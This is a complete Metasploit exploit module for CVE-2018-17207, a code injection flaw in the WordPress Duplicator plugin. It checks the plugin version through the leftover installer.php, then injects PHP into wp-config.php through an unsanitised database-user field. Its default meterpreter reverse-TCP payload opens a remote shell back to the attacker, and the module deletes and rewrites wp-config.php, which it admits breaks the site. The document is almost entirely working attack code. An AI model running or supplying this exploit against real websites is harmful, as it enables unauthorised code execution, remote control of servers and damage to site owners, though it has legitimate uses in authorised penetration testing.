WordPress Snap Creek Duplicator Code Injection

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ManualRanking # this module overwrites the configuration file, breaking the website  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Snap Creek Duplicator WordPress plugin code injection',  
'Description' => %q{  
When the WordPress plugin Snap Creek Duplicator restores a backup, it  
leaves dangerous files in the filesystem such as installer.php and  
installer-backup.php. These files allow anyone to call a function that  
overwrite the wp-config.php file AND this function does not sanitize  
POST parameters before inserting them inside the wp-config.php file,  
leading to arbitrary PHP code execution.  
WARNING: This exploit WILL break the wp-config.php file. If possible try  
to restore backups of the configuration after the exploit to make the  
WordPress site work again.  
},  
'Author' => [  
'Julien Legras <[email protected]>',  
'Thomas Chauchefoin <[email protected]>'  
],  
'References' => [  
['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],  
['WPVDB', '9123'],  
['CVE', '2018-17207']  
],  
'License' => MSF_LICENSE,  
'Privileged' => false,  
'DisclosureDate' => 'Aug 29 2018',  
'DefaultOptions' =>  
{  
'PAYLOAD' => 'php/meterpreter/reverse_tcp'  
},  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' => [['WordPress Duplicator <= 1.2.40', {}]],  
'DefaultTarget' => 0))  
  
register_options([  
OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),  
OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 40]),  
])  
end  
  
def check  
tpath = normalize_uri(datastore['TARGETURI'])  
  
vprint_status("Checking URI #{rhost+tpath}")  
response = send_request_cgi({ 'uri' => tpath}, timeout=datastore['TIMEOUT'])  
  
unless response  
vprint_error 'Connection failed'  
return CheckCode::Unknown  
end  
  
unless response.code == 200  
vprint_error("Server responded with #{response.code}")  
return CheckCode::Safe  
end  
  
version = response.body.to_s.scan( /version: ([^<]*)</).last.first  
if Gem::Version.new(version) <= Gem::Version.new("1.2.40")  
return CheckCode::Vulnerable  
else  
return CheckCode::Detected  
end  
  
end  
  
def create_wp_config_file  
# 1. GET the installer.php to retrieve the archive name.  
response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])  
unless response && response.code == 200  
fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")  
end  
archive_name = response.body.to_s.scan(/value="([^"]*.zip)"/).flatten.first  
if archive_name.blank?  
fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")  
end  
  
print_status("Found archive name #{archive_name}")  
  
# 2. Perform the 1st step to actually create the wp-config.php file.  
response = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(datastore['TARGETURI']),  
'vars_post' => {  
'action_ajax' => "1",  
'action_step' => "1",  
'archive_name' => archive_name,  
'archive_engine' => "ziparchive",  
'exe_safe_mode' => "0",  
'archive_filetime' => "current",  
'logging' => "1"  
}  
}, timeout=datastore['TIMEOUT'])  
unless response && response.code == 200  
fail_with(Failure::Unknown, "The archive file #{archive_name} was probably deleted.")  
end  
  
print_status("Successfully created the wp-config.php file!")  
end  
  
def exploit  
print_status("Checking if the wp-config.php file already exists...")  
tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')  
response = send_request_cgi({ 'uri' => tpath_wp_config}, timeout=datastore['TIMEOUT'])  
  
if response && response.code == 404 # we have to perform action_step 1 to create the wp-config.php file.  
print_status("This WordPress was not restored. Creating the wp-config.php file...")  
create_wp_config_file  
end  
  
# 2. Exploit the code injection.  
print_status("All good! Injecting PHP code in the wp-config.php file...")  
response = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(datastore['TARGETURI']),  
'vars_post' => {  
'action_ajax' => "3",  
'action_step' => "3",  
'dbhost' => rand_text_alphanumeric(20),  
'dbname' => rand_text_alphanumeric(20),  
'dbpass' => rand_text_alphanumeric(20),  
'dbuser' => "');?>" + payload.encoded + "/*",  
'dbport' => rand_text_numeric(5)  
}  
}, timeout=datastore['TIMEOUT'])  
  
if response && response.code == 200  
print_status("Requesting wp-config.php to execute the payload...")  
send_request_cgi({ 'uri' => tpath_wp_config }, timeout=datastore['TIMEOUT'])  
else  
print_error("Failed to inject PHP code in wp-config.php...")  
end  
end  
  
def on_new_session(client)  
if client.type.eql?('meterpreter')  
client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')  
client.fs.file.rm('wp-config.php')  
else  
client.shell_command_token('rm wp-config.php')  
end  
print_status("Attempting to recreate wp-config file...")  
create_wp_config_file  
end  
end  
`